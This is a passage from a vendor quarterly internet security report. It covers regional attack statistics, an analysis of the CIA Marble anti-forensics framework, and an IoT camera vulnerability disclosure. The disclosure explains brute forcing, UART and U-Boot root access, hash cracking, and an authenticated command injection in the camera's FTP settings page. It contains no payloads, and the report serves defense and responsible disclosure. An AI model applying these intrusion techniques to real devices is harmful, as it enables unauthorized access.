Geographic Attack DistributionThe general regional attack trends we saw in Q4 2016

continued this quarter, with the majority of the top

network attacks happening in EMEA. We did see mar-

ginally fewer attacks in APAC and more in the Amer-

icas, but overall, the regional trends look very much

like our normalized one from the last report.

Besides the overall regional trend, our feed data also

shows interesting country-specific nuances between

the individual top attacks.

• 96% of suspicious iframes were detected in North

America. The Suspicious HTML iframe threat

overwhelmingly affected North America, with 96%

of the hits falling in the U.S. and Canada. Iframes

are legitimate HTML tags designed to create

frames on a web page. However, web attacks often

leverage malicious iframes to redirect victims to a

malicious site. If an attacker can hijack a legitimate

website, they often use iframes to force that site’s

visitors to another site hosting their web exploit

kit (EK). We suspect these hits have to do with

increased web attack campaigns in the U.S. and

Canada.

• The top cross-site scripting (XSS) attack

targeted Italy 90% of the time. We haven’t

attributed it to a specific campaign, but most XSS

attacks in our top threat list affect victims in Italy.

• NGINX is a popular, open-source web and email

proxy server. The NGINX vulnerability in our top

10 is an old, but serious, flaw from four years ago.

While not as dominating as the examples above,

53% of the “NGINX HTTP_parse_chunked buffer

overflow” detections come from Germany.

The remaining hits are spread between 17 other

countries.

• Likewise, 46% of “JavaScript Obfuscation in

EKs” were found in the U.S. While that may not

seem like an overwhelming majority, the addition

hits we spread sparingly in 45 other countries.

• Finally, 73.6% of the tnftp attacks are split

between Great Britain (42.6%) and Australia

(31%). By the way, tnftp is a popular FTP client

for BSD platforms. Though it is an FTP client,

this vulnerability involves how it connects to

HTTP URLs. We are not sure why attackers are

primarily targeting Great Britain and Australia

with these tnftp attacks. Other than sharing a

mutual historical ancestry, these countries have

little in common.

EMEA

63.3%APAC

4.7%

Americas

32%

46% of JavaScript Obfuscation in EKs

were found in the U.S.

of the tnftp attacks are split between Great Britain (42.6%) and Australia (31%).

Figure 8: Malware detection by region

73.6%


https://www.nginx.com/resources/wiki/

https://en.wikipedia.org/wiki/Tnftp


of the malicious

JavaScript we saw

arrived in email.


Though some attacks are global, others target var-

ious countries differently. You can learn a lot from

this regional nuance. For instance, our data shows

that if you live in North America, you should look

out for web-based attacks and drive-by download

campaigns that leverage malicious exploit kits.

Meanwhile, if you’re in Spain, beware of XSS attacks,

and train your users to avoid clicking suspicious links.

Finally, if you live in the UK or Australia, be sure you

have updated tnftp.

• Malicious JavaScript primarily arrives in emails.

Like the previous quarter, we saw a significant

amount of malicious JavaScript in Q1. JavaScript

was designed for the web, so you might expect

to encounter it more there. However, we saw

more malicious JavaScript in email. Though

attackers do exploit malicious JavaScript with

their web-based EKs, 97.2% of the malicious

JavaScript we saw arrived in email. These

evil emails tend to include compressed Zip

attachments, which hide malicious .JS files. As

mentioned in the last report, this is a common

delivery vector for ransomware like Locky.

• Linux malware is sent over the web. In our

Malware Trends section, we mentioned that we

saw a lot of Linux-based threats in Q1. These

Linux threats were overwhelmingly delivered over

the web (99.99%), with only eight of the 419,367

instances arriving via email or FTP. This makes

sense if you think about how automated Linux

and IoT bots work. As seen in the screenshot

sample above, many malicious Linux scripts

simply use the “wget” command to grab other

malicious tools over an everyday web connection.

• Brazilian banking attack sends malicious Java

over email. Like JavaScript, Java is one of the

things you might expect to see more over the

web. However, 99.9% of the Java/Downloader

malware arrived over email. As mentioned before,

this attack occurred almost exclusively in Brazil,

which suggests this malware is associated with a

well-known attack campaign targeting Brazilian

banks. The attackers behind that campaign

send phishing emails that contain malicious .Jar

files; sometimes directly attached to the email,

but also often compressed within a Zip file.

The attackers use a malicious Java downloader

because it allows them to target both PCs and

Macs.

• The Bitcoin mining trojan was entirely delivered

via FTP. As mentioned earlier, Generic36.AAVT is

associated with Bitcoin mining trojans. This threat

was the only malware to buck the trend, and

not get delivered over email or the web. It was

almost exclusively FTP-based, with 1 exception

out of 77,704 instances. We’re not entirely sure

why this is; however, many traditional bots did

use FTP to download additional payloads. We

theorize that this could be another threat adding

a bitcoin miner

to a victim’s

computer as

a secondary

payload.


97.2%

https://securelist.com/blog/research/74051/first-step-in-cross-platform-trojan-bankers-from-brazil-done/



1

2

3

Firebox Feed Statistics Defense LearningsWe’ve shared several small defensive tips throughout this

section, but here are three defense strategies for some of the

top-level trends identified by Q1’s Firebox Feed data:

Harden your Linux servers and IoT devices.

Three, if not four (if you include PERL/

ShellBot) of the top ten Q1 malware variants

target Linux systems. We suspect this

increase comes from attackers launching

automated attacks against weak IoT devices.

Manufacturers focusing on usability and

affordability over security have released a huge

number of incredibly unsecure IoT devices

to the masses. Consumers with little security

knowledge often connect these devices to

the Internet without any firewall, allowing

attackers easy access. Open Telnet and SSH

combined with weak passwords allow attackers

to quickly infect swaths of hosts. At the very

least, we recommend you firewall your IoT

devices and Linux servers from the Internet.

Avoid opening access to command line

interfaces without additional authentication

or security mechanisms like VPN. Change your

default passwords and update your software or

firmware as often as possible.

The web battleground has shifted towards servers.

In Q4, we saw many browser-based attacks. However,

this quarter we saw more web server attacks. Spend

some time hardening your web servers, and don’t

forget any other services with web-based interfaces.

Hardening servers involves locking down permissions,

limiting resource exposure, and making sure the

server’s software is fully patched. You should also

audit your web applications for programmatic

vulnerabilities. Web application security is a complex

topic, but we recommend you visit OWASP.org for a

wealth of practical tips.

Traditional AV misses 38% of malware.

For the second quarter in a row, we have seen our legacy AV solution miss a lot of

malware that our more advanced solution can catch. In fact, it has gone up from 30% to

38%. Nowadays, cyber criminals use many subtle tricks to repack their malware so that

it evades signature-based detection. If you want to block most malware, you need to

deploy an advanced malware solution. These anti-malware solutions can often detect

never-before-seen zero day malware using more proactive detection techniques, such as

behavior analysis and machine learning. If you’re a WatchGuard customer, APT Blocker

catches the malware that traditional AV misses. If you don’t have an advanced malware

solution, you’ll likely miss more than one third of threats online.

http://www.owasp.org/


Top Security Incidents



Our goal with this section of the report is to introduce new research and technical detail that you didn’t

already hear from the news, or other research sources. This quarter, we cover the Marble framework from

the CIA Vault 7 leaks.

The CIA Vault 7 LeaksOn March 7, 2017, WikiLeaks began releasing a series of leaks from the U.S. Central Intelligence Agency (CIA)

code-named “Vault 7.” The initial leak included descriptions and details of the CIA’s covert hacking program,

including stockpiles of zero day exploits. The exploits targeted unpatched vulnerabilities in Android and iPhone

devices, Smart TVs, and traditional desktop and server operating systems like Windows, OS X, and Linux.

While the leaks contained many details for ongoing CIA projects, WikiLeaks consciously held back actual

source code and proof of concept (POC) exploits from the public, instead offering to share them with affected

manufacturers for analysis.

Two weeks after the first Vault 7 leak, WikiLeaks published a second release titled Dark Matter. The Dark Matter

release disclosed several rootkit tools the CIA used to gain persistence on Apple computers by infecting the

firmware. The leak included the user manual for a modified Thunderbolt-to-Ethernet adapter, code-named the

“Sonic Screwdriver,” capable of bypassing EFI/UEFI protections on the target host to facilitate installation of

the rootkit. Dark Matter also disclosed similar tools for infecting Apple’s iOS mobile operating system, dating

back to 2008.

For sophisticated hackers, covering your tracks is one of the most important parts of an attack. Stealing

sensitive information does you no good if investigators can clearly trace the attack back to you. The act of

investigating an attack, and analyzing its artifacts is called computer forensics. On March 31, WikiLeaks contin-

ued their “Vault 7” leaks with the release of the CIA’s anti-forensics tool, called the Marble framework. The leak

included the Marble’s source code and user documentation.

A Technical Analysis of the Marble FrameworkWhen malware authors write source code, they often include strings of text along with the regular compu-

tational instructions. Such strings can include file paths, Windows registry key names, and sometimes even

hard-coded words or passwords. When they compile their source, these strings remain present in the execut-

able, for anyone to find.

When analyzing malware, forensic investigators usually first check executables for any human-readable strings,

which may provide clues about the malware and its origins. The CIA primarily designed the Marble framework

to obfuscate these strings of text, in hopes of preventing investigators from linking CIA malware to a specific

developer (i.e. the CIA).

Top Security IncidentsEvery quarter, several major security stories make the headlines. Some of

these stories involve well-known products or services, or simply have a major

effect on the security of the overall industry. The media does a great job

informing the public of these issues, but they don’t always dig into, or

research, the technical details.

https://en.wikipedia.org/wiki/Rootkit

https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface

https://en.wikipedia.org/wiki/Computer_forensics



The framework includes several modules with different purposes. The Mibster module looks for strings marked

for obfuscation and performs the actual scrambling. The Validator module checks the compiled executable file

and confirms that all the marked strings were successfully scrambled. Finally, the Mender module reverts the

source code back to its original state in the event of an error, or if manually requested by the malware author.

To understand the Marble framework, you must first understand how programming languages like C and C++

store strings of text. If you were developing a new ransomware variant, you probably would want to include

a function that creates a text file with a ransom note on the victim’s desktop. You might include the string of

text, “YOUR FILES ARE ENCRYPTED”, inside this text file. In order for your ransomware to create that note, it

would have to include that string of text in its source code.

C and C++ store string variables as an array of individual characters, terminated by a null byte

(C++ also includes a variable data type specifically for strings, which we’ll ignore).

Figure 9: String as character array storage example

Each character in the character array takes up 8-bits or 1-byte of memory, which is large enough to store any

letter in the English alphabet. Other written languages, such as Cyrillic, require multiple bytes for each char-

acter. The wchar_t (wide character) data type allows C and C++ to use 16-bits or 2-bytes of storage for each

character. To store the Russian string “шифровать” (roughly “encrypt” in English),

we would use an array of wide characters.

Figure 10: String as wide-character array storage example

The Marble framework defines two new data types for string storage. The “CARBLE” data type is 1-byte long

and matches up to the original “char” data type, while the “WARBLE” data type is 2-bytes long and matches

up to the original “wchar_t” data type. Strings that are defined using the new CARBLE and WARBLE data

types are obfuscated by the framework when the source code is compiled into an executable.

Figure 11: Marble framework new string storage data types

When using the Marble framework, a malware author first chooses which of the different obfuscation algo-

rithms – or “Marbles” as the CIA calls them – they wish to use. The framework contains 106 different algorithms

by default, 48 using C++ and 58 using C. The documentation also includes instructions for adding additional

algorithms.

After selecting the pool of obfuscation algorithms, the malware author adds the framework to their project,

and includes instructions for the compiler to run Mibster (the obfuscation module) during compilation. Now

the malware developer can use the newly defined CARBLE and WARBLE data types to flag strings for obfus-

cation by Mibster.

https://en.wikipedia.org/wiki/Wide_character


When the malware author compiles their code, Mibster choses an obfuscation algorithm from the pool, and

then notes all the source files containing the CARBLE and WARBLE data types. It creates a “gold copy”

(un-modified) of those files to safely revert to the originals in case of an error during obfuscation.

Next, Mibster parses these files, looking for strings using the CARBLE and WARBLE data types. When it

locates them, it scrambles the string using the chosen obfuscation algorithms. It replaces the original with a

newly scrambled string and an additional de-obfuscation code. The de-obfuscation code allows the compiled

executable (malware) to retrieve the original string when it needs it.

After Mibster completes the obfuscation process, the framework validates the output to confirm all the marked

strings were scrambled. If it encounters any errors, the Mender module reverts the source code back to its

original (using the gold copy files).

In the end, the Marble framework scrambles all the human-readable strings within an executable, making it

difficult for a forensic investigator to learn anything about the author from these strings.

Marble Obfuscation Algorithms As for the obfuscation algorithms themselves, each algorithm generates a random key of different sizes

depending on the algorithm used.

Figure 12: Obfuscation random key generation

As Mibster feeds a string through the algorithm, it modifies each character using a character from the key.

The modification either adds or subtracts the value of the key with the character being modified (bumping),

or XORs it (Exclusive OR).

Figure 13: Obfsucation XOR algorithm

As mentioned before, the de-obfuscation code is the internal mechanism that allows the compiled execut-

able to read an obfuscated string by returning in to its original state while the program is running. One other

difference between the available algorithms is how they implement this de-obfuscation code. Some place the

de-obfuscation code alongside the scrambled string as a computational loop, others call a separate function

stored elsewhere in the executable.

Figure 14: De-obfuscation code generation


https://en.wikipedia.org/wiki/Exclusive_or


The leaked Marble framework is a fairly complex tool used to throw off savvy forensic investigators, not normal

users. However, the average administrator can still draw out a few defensive learnings from this example.

Marble Framework Defense Learnings

Obfuscation can also help malware hide from detection

There’s a big difference between executable code obfuscation and anti-forensic string obfuscation.

The Marble framework provides the latter, and doesn’t really help malware evade detection. It just

makes it harder for investigators to attribute the malware. That said, this incident reminds us that

criminal attackers also use code obfuscation similarly to hide malware from antivirus (AV) software.

Signature-based AV solutions looking for certain code patterns won’t find them if the code is

obfuscated. This highlights the necessity for more advanced malware detection solutions, such as

behavior-based sandboxes, to detect obfuscated malware.

Beware of false flag attacks in nation-state attacks

The user documentation released in the Vault 7 leak confirms that the Marble

obfuscation tools support foreign languages. This suggests that the CIA could

leverage this tool to obfuscate their malware to appear like it comes from another

country; something experts call a false flag attack. While there is no direct evidence

that supports the CIA used Marble in this way, you should be aware of the possibility.

Expect false flags to trickle down to criminal malware

More importantly, be aware that the release of the Marble framework now enables even

unsophisticated criminals to obfuscate their malware in a way that could be falsely attributed

to the CIA. Malware authors could even backdate the compile timestamp to make their malware

appear as though it was created before the public release of the framework. We expect some

criminal malware to start using string obfuscation to throw off investigators.

1

2

3



WatchGuard Threat Lab’s IoT Research Project



WatchGuard Threat Lab’s IoT Research Projects

In response to the rapid spread of the Mirai botnet, and the perceived general

insecurity of new consumer IoT devices, WatchGuard’s Threat Lab launched

an ongoing project to analyze various IoT devices for security flaws. Some

of our test targets included Wi-Fi cameras, fitness accessories, and even a

wireless egg tray. Any security flaws our researchers find are responsibly

disclosed to device manufacturers for patching. Furthermore, we wait 90

days before full disclosure in the event that vendors don’t respond to our

disclosure notice.

In this report, we finally share some zero day vulnerabilities that were discovered in early January. Since the vendor did not respond to our researcher’s disclosure, we had to wait the full 90 days before sharing these details.Ouvis C2 HD Security Camera

Responsible Disclosure: Ouvis C2 HD Security Camera

As a part of our ongoing IoT vulnerability research project, one of the

recently tested devices included the Ouvis C2 HD Wireless Security Camera.

This is a wireless camera that includes Android, iOS and browser-based

remote viewing.

Open Telnet Access

When first examining new network devices for vulnerabilities, researchers

typically start by port scanning the device to identify any open services.

Figure 15: nmap port scan output

https://www.amazon.com/gp/product/B01JUG2HKK



A port scan of the Ouvis camera showed open Telnet on TCP/23 and an HTTP web server running on TCP/81 – a

non-standard port for web servers. We immediately noted the open Telnet access as a potential security vulnerability,

since Telnet offers no encryption. There is no reason for consumer IoT devices to allow Telnet-based management

access, especially when more secure options like SSH exist. Malicious applications like the Mirai botnet thrive because

of open Telnet access combined with weak default passphrases.

After detecting an open Telnet port, a penetration (pen) tester typically tries to obtain privileged command-line

access to the device through Telnet. To gain such access, the pen tester needs to figure out the username and

password for the ‘root’ account on the device. Since these CLI interfaces are often left in for diagnostic purposes,

manufacturers don’t share credentials for them, and don’t necessarily intend them for the customer’s use.

Brute forcing to the rescue. In respect to authentication, a brute force attack is the act of rapidly trying different

username and password combinations against a login. Using an application called THC Hydra, our researcher at-

tempted to brute force the credentials for the device. To speed up the attack, he configured Hydra to use a wordlist

containing thousands of common passphrases. After several hours of trying different username name and password

combinations, Hydra was unable to find working credentials.

After failing to brute force credentials, the threat research team was forced to find other methods for obtaining root

access. The next step involved disassembling the camera in search of console serial access. Luckily, one of the circuit

boards in the camera had UART pads.

Figure 16: hydra password brute force via

Figure 17: Empty UART pads

https://en.wikipedia.org/wiki/Universal_asynchronous_receiver/transmitter



After soldering a USB-TTY to UART cable to the empty pads, the team could access the camera’s

serial console (115200 baud rate).

Figure 18: Camera U-Boot output

Figure 19: Modifying the U-Boot configuration

Figure 20: Hashed root password

After halting the boot process, our researcher modified the U-Boot configuration to initialize a shell after

mounting the filesystem.

Our researcher was finally greeted with a command line shell for the camera. Once connected,

he checked /etc/passwd for any user accounts and easily found the root account and its hashed password.

Summary


Access to a password hash allows for faster, more efficient offline password cracking. In one last attempt to obtain the

root password, our team fed the passwd file through hashcat, a popular hash cracking application. After several days of

cracking, attempting every possible character combination up to and including eight characters, hashcat failed to yield

any results.

We still consider this open Telnet access a weakness, especially since the device includes a hard-coded root password

(which some might call a backdoor account). The good news is the root password has withstood several significant

cracking attempts so far. It seems the device manufacturer was at least conscious enough to use a strong password.

That said, if anyone ever recovers this password, it could provide a backdoor to all these devices. In fact, we have since

correlated with other researchers’ analysis, and have confirmed that all these Ouvis cameras share the same root pass-

word hash. If the password ever leaks, it will provide attackers with unrestricted access to these devices.

Authenticated Remote Code Execution VulnerabilityIn auditing IoT devices like webcams, our research team frequently finds web application flaws in web management

portals due to un-sanitized inputs. After finding a remote code execution vulnerability in one of the web management

pages of a similar IoT camera, the team checked the same location (FTP backup settings) for this Ouvis camera, and

found the exact same vulnerability (see our Q4 report for more details on the previous issue).

Figure 21: Hashed root password

A packet capture of DNS traffic from the camera showed an attempted name resolution for ‘rce.bad’, confirming the

remote code execution vulnerability.

As it turned out, the Common Gateway Interface (CGI) handler for FTP configuration (set_ftp.cgi) did not sanitize

the user input before saving it to an FTP upload script located at /tmp/ftpupload.sh. The camera runs this script as a

privileged user, which in turn executes any command an attacker injects into this un-sanitized input (in our example, the

ping command).

This serious vulnerability could allow attackers to execute any command on this camera as root, thus elevating their

privileges. However, this is an “authenticated” vulnerability, meaning the attacker must already have valid management

credentials in order to exploit this flaw.

ConclusionAfter confirming both vulnerabilities, our researchers immediately submitted a report to Ouvis via their support contact.

Ouvis did not respond to our disclosure attempts over a 90-day period.

After 60 days, a separate researcher disclosed the same, and further vulnerabilities in a series of cameras appearing

to be manufactured by the same OEM supplier. Because the Ouvis C2 was not present in Pierre Kim’s list of affected

models, we continued the originally planned 90-day disclosure period. After no contact from the vendor, we responsibly

disclosed this research publicly on April 24, 2017.

Timeline

• 2 January 2017 – Vulnerabilities discovered

• 4 January 2017 – Reported to manufacturer

• 3 February 2017 – Manufacturer contacted a second time

• 6 March 2017 – Manufacturer informed of imminent public disclosure

• 8 March 2017 – Similar vulnerabilities zero day’d by Pierre Kim

• 3 April 2017 – Manufacturer contacted a final time

• 24 April 2017 – Public Disclosure

https://hashcat.net/hashcat/


https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html

https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html



Avoid exposing CLI management interfaces to the InternetMost IoT devices have no legitimate

need for CLI access via Telnet or

SSH. If you port scan your IoT device

and find open CLI access, take extra

caution while deploying it. Implement

network firewall rules to block inbound

Telnet and SSH access not only from

the Internet, but from other internal

networks as well (to prevent attack

pivoting).Avoid IoT devices with hard-coded backdoor accounts Some manufacturers ship IoT devices with

set accounts that have the same hard-cod-

ed password for all devices. If consumers

are unaware of the account, it’s essential-

ly a backdoor. Before purchasing an IoT

device, research the manufacturer’s history

in securing their products. Avoid vendors

that are known to include hard-coded

backdoor accounts in their IoT devices.

Change default passwordsIoT manufacturers often hardcode

weak or non-existent passwords to

make their products easier to use (at

the risk of security). When first setting

up a new IoT device your first task

should be setting new, difficult-to-

guess passwords wherever possible.

12

3

WatchGuard Threat Lab’s Research Defense Learnings

Our research shows consumer IoT devices continue to ship with weaknesses and security vulnerabilities. At

best, these issues could result in loss of privacy for consumers. At worst, they might allow attackers to take

over these devices, gaining a foothold into your internal network.

Consumers should take steps to secure the IoT devices they purchase, as well as urge device manufacturers to

focus on security. At a minimum, here are three IoT defense strategies that help.


Defense Highlights


One lesson you learn if you follow any trend over time is things change.

Sometimes they change at a glacial pace, so slowly that you may not notice the

alterations. Other times they change overnight, so quickly that you can’t get your

bearings straight. This constant change applies directly to the threat and security

landscape as well.

Defense Highlights

Conclusion & Defense Highlights

Macro malware – a top threat from Q4 2016 – dropped of our list, becoming less relevant in Q1. Meanwhile, we saw three times as much Linux malware as we did before, suggesting attackers have increased their efforts to target IoT.

This quarter, we saw some of the same malware and

network attacks retain their place on our top threat

lists. However, we also saw new threats and exploits

replace the old ones. For instance, macro malware

– a top threat from Q4 2016 – dropped off our list,

becoming less relevant in Q1. Meanwhile, we saw

three times as much Linux malware as we did before,

suggesting attackers have increased their efforts to

target IoT.

When change happens unexpectedly, it feels scary,

and can cause unforeseen surprises that hurt when

they hit you unprepared. However, change doesn’t

have to be scary. In fact, when you vigilantly monitor

change, you can adapt and prepare for it, protecting

yourself from unanticipated consequences.

That’s the whole point of this quarterly security

report – to prepare you for change in the threat

landscape. By staying current with the latest threat

trends, you can adapt your technical and social se-

curity strategies to defend against evolving threats.

Throughout this report, we shared detailed defense

lessons for the individual trends we identified. We’ll

end with a few final high-level defense strategies

every organization should consider.

Defense Highlights


Basic security policies still block many threats

Security experts often spend much of their time talking about the most sophisticated

threats. We get excited about new zero day exploits, the latest kernel rootkits, and other

never-before-seen attacks and evasion techniques. From a security expert’s perspec-

tive, it makes sense to focus on the more interesting, advanced threats, which will surely

become more common in the future. However, our data shows that the top threats

aren’t always new or sophisticated. In fact, most of the popular network attacks we saw

this quarter exploited old vulnerabilities that were patched long ago. Many of the top

malware samples we identified were well-known examples, which attackers have used

for years. Even the vulnerabilities we found in IoT devices were very standard weakness-

es that have simple solutions. The point is, you can prevent a significant slice of these

threats just by following some basic security practices. Patch your software often. Avoid

opening unsolicited files, or clicking unexpected links. Firewall your IoT devices. These

simple practices still do help.

Basic firewalls are incomplete without other security layersFirewalls remain a critical part of our security infrastructure. You must limit the network

services you expose to the Internet (as proven with unsecure IoT devices). However, a

firewall alone is not enough. Today, most attacks don’t target exposed services directly,

but rather target your users instead. Even with a firewall, almost all organizations open

holes allowing their users to reach the web, get email, or transfer files (among other

things). To protect against today’s client-side attacks, you must also implement a suite

of security services, such as intrusion prevention, anti-malware, IP and URL filtering,

and more to monitor the services you allow through your firewall for malicious activity.

If you don’t yet have a layered security strategy, consider a unified threat management

platform that combines basic firewalling with many other layers of protection.

Segment and harden your IoT devices

In the current state of the industry, IoT devices can’t yet be trusted. While there are

certainly exceptions, our research, as well as other industry research, suggests the vast

majority of IoT devices have major security weaknesses, and can pose a threat to the

rest of your network. You might presume criminals don’t care about your webcams,

refrigerators, or DVRS, but attackers known they can use these local devices to reach

more important computers in your network. Since manufacturers are shipping these

devices with vulnerabilities, it’s up to you to secure them. First, firewall IoT devices from

the Internet and only expose necessary services. In fact, we recommend you segment

them on your internal network, too. That way if someone hijacks your IoT device, they

don’t immediately gain access to everything else. Finally, remember to change default

passwords, disable unnecessary services, and patch these products as often as possible.

Invest in advanced malware prevention

We said it last quarter, and it remains true this quarter; if you don’t have an advanced

malware protection solution, you will eventually get infected. While many of the threats

we see are well known, it’s clear attackers regularly repackage their old malware to

evade pattern-based detection. This quarter we learned that 38% – over one third – of

the malware we detected got past legacy signature-based AV solutions. The industry

has long understood the weakness in reactive, pattern-based AV, but this problem has

reached a critical mass. More and more victims are getting infected with threats like

ransomware despite having basic protection. To catch today’s more evasive malware,

you need solutions that use more proactive detection techniques, such as behavioral

analysis, or machine learning and big data analytics. We recommend you invest in an

advanced malware solution. If you’re a WatchGuard customers, our APT Blocker and

Threat Detection and Response offerings provide this service.

Summary

If you made it this far, thank you for reading our report to the end. We hope you found the trends and analysis

enlightening, and use these learnings to protect your networks and organizations. Feel free to share any feed-

back you have about the report with [email protected], and join us next quarter.

About WatchGuard Threat Lab

WatchGuard’s Threat Lab (previously the LiveSecurity Threat Team) is a group of dedicated threat researchers

committed to discovering and studying the latest malware and Internet attacks. The Threat Lab team analyzes

data from WatchGuard’s Firebox Feed, internal and partner threat intelligence, and a research honeynet, to

provide insightful analysis about the top threats on the Internet. Their smart, practical security advice will

enable you to better protect your organization in the ever-changing threat landscape.

About WatchGuard Technologies

WatchGuard® Technologies, Inc. is a global leader in network security, providing best-in-class Unified Threat

Management, Next Generation Firewall, secure Wi-Fi, and network intelligence products and services to more

than 80,000 customers worldwide. The company’s mission is to make enterprise-grade security accessible

to companies of all types and sizes through simplicity, making WatchGuard an ideal solution for distributed

enterprises and SMBs. WatchGuard is headquartered in Seattle, Washington, with offices throughout North

America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.

For additional information, promotions and updates, follow WatchGuard on Twitter @WatchGuard, on

Facebook, and on the LinkedIn Company page. Also, visit our InfoSec blog, Secplicity, for real-time information

about the latest threats and how to cope with them at www.secplicity.org.

Corey Nachreiner

Chief Technology Officer

Recognized as a thought leader in IT security, Nachreiner spearheads WatchGuard’s

technology vision and direction. Previously, he was the director of strategy and

research at WatchGuard. Nachreiner has operated at the frontline of cyber security

for 16 years, and for nearly a decade has been evaluating and making accurate

predictions about information security trends. As an authority on network security

and internationally quoted commentator, Nachreiner’s expertise and ability to dissect

complex security topics make him a sought-after speaker at forums such as Gartner,

Infosec and RSA. He is also a regular contributor to leading publications including

CNET, Dark Reading, eWeek, Help Net Security, Information Week and Infosecurity,

and delivers WatchGuard’s “Daily Security Byte” video on Facebook.

Marc Laliberte Security Threat Analyst Specializing in network security technologies, Marc’s industry experience allows him

to conduct meaningful information security research and educate audiences on the

latest cyber security trends and best practices. With speaking appearances at IT

conferences and regular contributions to online IT and security publications, Marc is

a security expert who enjoys providing unique insights and guidance to all levels of

IT personnel.

© 2017 WatchGuard Technologies, Inc. All rights reserved. WatchGuard, the WatchGuard logo, LiveSecurity, and Firebox are registered trademarks of WatchGuard Technologies, Inc. in the United States and/or other countries. All other tradenames are the property of their respective owners. Part No. WGCE67003_062017

mailto:[email protected]

http://www.WatchGuard.com

http://www.secplicity.org

quarter 1, 2017 - sc magazine · quarter 1, 2017 internet security report. internet security...

Documents